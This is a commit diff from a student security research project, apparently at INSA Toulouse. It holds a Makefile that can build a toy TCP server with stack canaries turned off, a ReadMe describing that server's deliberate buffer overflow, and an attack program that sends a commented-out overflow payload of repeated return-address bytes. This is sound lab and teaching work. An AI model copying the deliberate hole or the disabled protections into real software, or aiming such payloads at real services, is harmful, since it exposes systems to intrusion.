Réecriture de l'attaque et amélioration du Makefile

Makefile

@@ -1,12 +1,12 @@
 default: 
-	@echo "Usage : [ Classic | SansCanary | 32bits | 32bitsSansCanary | Attaque ]"
+	@echo "Usage : [ 64b | 64b_nocanary | 32b | 32b_nocanary ]"
 
-Classic: cleanServCli serveur client
+64b: clean_serv_client serv64b client64b attaque
-SansCanary: cleanServCli serveurSsCanary client
+64b_nocanary: clean_serv_client serv64b_nocanary client64b attaque
-32bits: cleanServCli serveur32 client32
+32b: clean_serv_client serv32b client32b attaque
-32bitsSansCanary: cleanServCli serveur32SsCanary client32
+32b_nocanary: clean_serv_client serv32b_nocanary client32b attaque
 
-Attaque: cleanAttaque attaque.c
+attaque: attaque.c
 	@echo "######################################"
 	@echo "# Compilation du programme ATTAQUANT #"
 	@echo "######################################"
@@ -15,67 +15,67 @@ Attaque: cleanAttaque attaque.c
 	@echo ""
 	@echo ""
 
-serveur: Serveur.c
+serv64b: serveur.c
 	@echo "######################################"
 	@echo "####### Compilation du SERVEUR #######"
 	@echo "######################################"
 	@echo ""
-	gcc -Wall Serveur.c -o serveur
+	gcc -Wall serveur.c -o serveur
 	@echo ""
 	@echo ""
 
-client: Client.c
+client64b: client.c
 	@echo "######################################"
 	@echo "####### Compilation du CLIENT  #######"
 	@echo "######################################"
 	@echo ""
-	gcc -Wall Client.c -o client
+	gcc -Wall client.c -o client
 	@echo ""
 	@echo ""
 
-serveur32: Serveur.c
+serv32b: serveur.c
 	@echo "######################################"
 	@echo "# Compilation du SERVEUR en 32 bits  #"
 	@echo "######################################"
 	@echo ""
-	gcc -Wall -m32 Serveur.c -o serveur
+	gcc -Wall -m32 serveur.c -o serveur
 	@echo ""
 	@echo ""
 
-client32: Client.c
+client32b: client.c
 	@echo "######################################"
 	@echo "## Compilation du CLIENT en 32 bits ##"
 	@echo "######################################"
 	@echo ""
-	gcc -Wall -m32 Client.c -o client
+	gcc -Wall -m32 client.c -o client
 	@echo ""
 	@echo ""
 
-serveurSsCanary: Serveur.c
+serv64b_nocanary: serveur.c
 	@echo "######################################"
 	@echo "# Compilation du SERVEUR sans Canary #"
 	@echo "######################################"
 	@echo ""
-	gcc -Wall -fno-stack-protector Serveur.c -o serveur
+	gcc -Wall -fno-stack-protector serveur.c -o serveur
 	@echo ""
 	@echo ""
 
-serveur32SsCanary: Serveur.c
+serv32b_nocanary: serveur.c
 	@echo "#################################################"
 	@echo "# Compilation du SERVEUR en 32 bits sans Canary #"
 	@echo "#################################################"
 	@echo ""
-	gcc -Wall -m32 -fno-stack-protector Serveur.c -o serveur
+	gcc -Wall -m32 -fno-stack-protector serveur.c -o serveur
 	@echo ""
 	@echo ""
 
 edit:
-	pluma Serveur.c Client.c Attaque.c &
+	pluma serveur.c client.c Attaque.c &
 
-cleanAttaque: 
+clean_attack:
 	@rm -f attaque
 
-cleanServCli:
+clean_serv_client:
 	@rm -f client serveur
 
-clean: cleanAttaque cleanServCli
+clean: clean_attack clean_serv_client

ReadMe.md

@@ -1,23 +1,46 @@
+# Projet d'Initiation à la Recherche (PIR) | 4A-IR-SI | INSA Toulouse
 
-Projet d'Initiation à la Recherche (PIR) | 4A-IR-SI | INSA Toulouse
+**Membres** :
 
-NOM DU PIR
-
-Membres : (Noms ecrit de mémoire, check orthographe)
 - Léonie Gallois
 - Elies Tali
 - Yohan Simard
 - Paul Faure
-	- Nahom Bellay
+- Nahom Belay
-	- Jean Remi Hok
+- Jean-Rémy Hok
+
+**Tuteurs** :
 
-Tuteurs : 
 - Didier Le Botlan
-	- Eric AlataS
+- Eric Alata
 
-WARNING : TO USE THE MAKEFILE YOU MAY NEED "gcc-multilib" (sudo apt-get install gcc-multilib)
+## Compilation
 
-Programmes SERVEUR et CLIENT, principe général : 
+WARNING : TO USE THE MAKEFILE YOU MAY NEED "gcc-multilib" (`sudo apt-get install gcc-multilib`)
+
+### Commandes make
+
+Ces commandes compileront les trois exécutables client, serveur et attaque.
+
+*Note : le programme attaque est toujours compilé en 64 bits avec canary, car il n'y a pas d'utilité à le compiler autrement.*
+
+#### 64bit, avec canary
+
+`make 64b`
+
+#### 64bit, sans canary
+
+`make 64b_nocanary`
+
+#### 32bit, avec canary
+
+`make 32b`
+
+#### 32bit, sans canary
+
+`make 32b_nocanary`
+
+## Principe général
 
 	- Le serveur : Gere un entier (init 0) En écoute sur un port passé en paramètre, des qu'une connexion arrive, il fork, traite la connexion dans le fils, le père se remet en attente
 	- Gestion de la connexion : Attends une chaine de caractère du client, et, en fonction de son contenu effectue les actions adéquates
@@ -33,7 +56,7 @@ Programmes SERVEUR et CLIENT, principe général :
 			* Le serveur copie la chaine reçue avec le read mal fait -> risque de buffer Overflow
 			* Le serveur fork, l'attaquant peut accumuler de la connaissance
 
-Etapes de dévellopement : 
+## Étapes de dévelopement
 
 	- Step 1 : FAIT
 			* Le serveur  : Gere le nombre de connexions, à chaque connexions, il l'affiche juste.

attaque.c

@@ -1,69 +1,64 @@
 #include <stdio.h>
-#include <stdlib.h>
 #include <unistd.h>
+#include <string.h>
+#include <stdlib.h>
 
 #define LATENCE 10000
-#define FAT_LATENCE 1000000
 #define FUNCTION usleep
 #define SIZE_BUFF 228
-#define NUM_PORT 1258
+
+char prog_name[100];
+
+void runClientWithCommand(char *cmd) {
+	FILE *prog = popen(prog_name, "w");
+	FUNCTION(LATENCE);
+	if (prog == NULL) {
+		printf("ERREUR\n");
+		return;
+	}
+	fprintf(prog, "%s", cmd);
+	printf("%s", cmd);
+	FUNCTION(LATENCE);
+	fprintf(prog, "QUIT\n");
+	printf("QUIT\n");
+	pclose(prog);
+}
 
 int main(int argc, char *argv[]) {
-	char prog_name[30];
+	if (argc != 3) {
-	sprintf(prog_name, "./client localhost %d", NUM_PORT);
+		printf("Usage : ./attaque addresseServeur portServeur\n");
-	// On ajoute 100 a la valeur
+		return 2;
-	FILE * prog = popen(prog_name, "w");
-	if (prog == NULL) {
-		printf("ERREUR\n");
 	}
-	FUNCTION(LATENCE);
+	int port = atoi(argv[2]);
-	fprintf(prog, "ADD\n");
+	if (port <= 0 || port > 65535) {
-	printf("ADD\n");
+		printf("Usage : ./attaque addresseServeur portServeur\n");
-	FUNCTION(LATENCE);
+		return 3;
-	fprintf(prog, "100\n");
+	}
-	printf("100\n");
+	sprintf(prog_name, "./client %s %s", argv[1], argv[2]);
-	FUNCTION(LATENCE);
-	pclose(prog);
 
-	// On affiche la valeur
+	// On ecrit 100 a l'index 2
-	prog = popen(prog_name, "w");
+	printf("-- Write --\n");
-	if (prog == NULL) {
+	runClientWithCommand("WRITE 100 2\n");
-		printf("ERREUR\n");
-	}
-	FUNCTION(LATENCE);
-	fprintf(prog, "PRINT\n");
-	printf("PRINT\n");
-	FUNCTION(LATENCE);
-	pclose(prog);
 
-	// On hack pour RESET
+	// On affiche la valeur a l'index 1
-	prog = popen(prog_name, "w");
+	printf("-- Read --\n");
-	if (prog == NULL) {
+	runClientWithCommand("READ 1\n");
-		printf("ERREUR\n");
-	}
-	FUNCTION(LATENCE);
-	char buff[SIZE_BUFF + 1];
-	int i;
-	for (i=0; i<(SIZE_BUFF / 4); i++) {
-		buff[(i*4)] = 0xef;
-		buff[(i*4) + 1] = 0xca;
-		buff[(i*4) + 2] = 0x5c;
-		buff[(i*4) + 3] = 0x56;
-	}
-	buff[SIZE_BUFF] = '\0';
-	fprintf(prog, "%s\n", buff);
-	printf("Hack : %s\n%x%x%x%x\n", buff, buff[0], buff[1], buff[2], buff[3]);
-	FUNCTION(LATENCE);
-	pclose(prog);
 
-	// On Affiche pour verifier 
+	// On affiche le tableau sur le serveur
-	prog = popen(prog_name, "w");
+	printf("-- Print --\n");
-	if (prog == NULL) {
+	runClientWithCommand("PRINT\n");
-		printf("ERREUR\n");
+
-	}
+	// TODO
-	FUNCTION(LATENCE);
+//    // On hack pour RESET
-	fprintf(prog, "PRINT\n");
+//    printf("-- Hack --\n");
-	printf("PRINT\n");
+//    char buff[SIZE_BUFF + 1];
-	FUNCTION(LATENCE);
+//    int i;
-	pclose(prog);
+//    for (i=0; i<(SIZE_BUFF / 4); i++) {
+//        buff[(i*4)] = 0xef;
+//        buff[(i*4) + 1] = 0xca;
+//        buff[(i*4) + 2] = 0x5c;
+//        buff[(i*4) + 3] = 0x56;
+//    }
+//    buff[SIZE_BUFF] = '\0';
+//    runClientWithCommand(buff);
 }

serveur.c

@@ -12,8 +12,8 @@
 /* la lib standard */
 #include <stdlib.h>
 /* pour le fork */
-#include <unistd.h>
 #include <signal.h>
+#include <unistd.h>
 
 /* pour la manipulation des strings */
 #include <string.h>
@@ -24,12 +24,9 @@
 #define NB_SEP 65
 #define NB_PAR_LIGNE 16
 
-
-
 // printf("BEFORE: %p\n", __builtin_return_address(0));
 
-void handle_sigsegv(int signum)
+void handle_sigsegv(int signum) {
-{
 	fprintf(stderr, "Signal SIGSEGV (%d) received : SEG FAULT\n", signum);
 	_exit(0);
 }
@@ -80,8 +77,6 @@ void print_tab(int * tab, int n) {
 	}
 }
 
-	
-
 // Fonction lancée a chaque fork
 void process(int sock) {
 	// Tableau des datas du client
@@ -98,7 +93,11 @@ void process(int sock) {
 	while (quit == 0) {
 		// récupération de l'input du client
 		char buff[40] = "\0";
-  	read(sock, buff, 40);
+		int nbBytesRead = read(sock, buff, 40);
+
+		if (nbBytesRead == 0) {
+			break;
+		}
 
 		char what;
 		int param1;
@@ -141,7 +140,6 @@ void process(int sock) {
 	}
 }
 
-
 int main(int argc, char *argv[]) {
 	if (argc != 2) {
 		printf("ERREUR : Usage : ./serveur N°Port\n");
@@ -149,8 +147,7 @@ int main(int argc, char * argv[]) {
 	}
 
 	// install a handler for SIGSEGV in a part of your code
-	if(signal(SIGSEGV,&handle_sigsegv)==SIG_ERR)
+	if (signal(SIGSEGV, &handle_sigsegv) == SIG_ERR) {
-	{
 		fprintf(stderr, "Could not install SIGSEGV handler");
 		return -1;
 	}
@@ -171,7 +168,8 @@ int main(int argc, char * argv[]) {
 	addr_local.sin_addr.s_addr = INADDR_ANY;
 
 	// On bind l'adresse du socket créee avec le socket local
-	binder = bind(sock,(struct sockaddr *) &addr_local, sizeof(struct sockaddr_in));
+	binder =
+			bind(sock, (struct sockaddr *) &addr_local, sizeof(struct sockaddr_in));
 	if (binder == -1) {
 		printf("ERREUR lors du bind du socket\n");
 		exit(1);
@@ -184,12 +182,14 @@ int main(int argc, char * argv[]) {
 	struct sockaddr_in addr_em;
 	unsigned int longueur_addr_em = sizeof(struct sockaddr_in);
 
-	// On se met en état d'acceptation de connexion (et on crée un socket en passant)
+	// On se met en état d'acceptation de connexion (et on crée un socket en
+	// passant)
 	int pid = 1;
 	int nb_connexions = 0;
 	while (pid != 0) {
 
-	  int sock_connexion = accept(sock, (struct sockaddr *)&addr_em, &longueur_addr_em);
+		int sock_connexion =
+				accept(sock, (struct sockaddr *) &addr_em, &longueur_addr_em);
 		nb_connexions++;
 		pid = fork();
 
@@ -208,4 +208,3 @@ int main(int argc, char * argv[]) {
 	}
 	return 0;
 }
-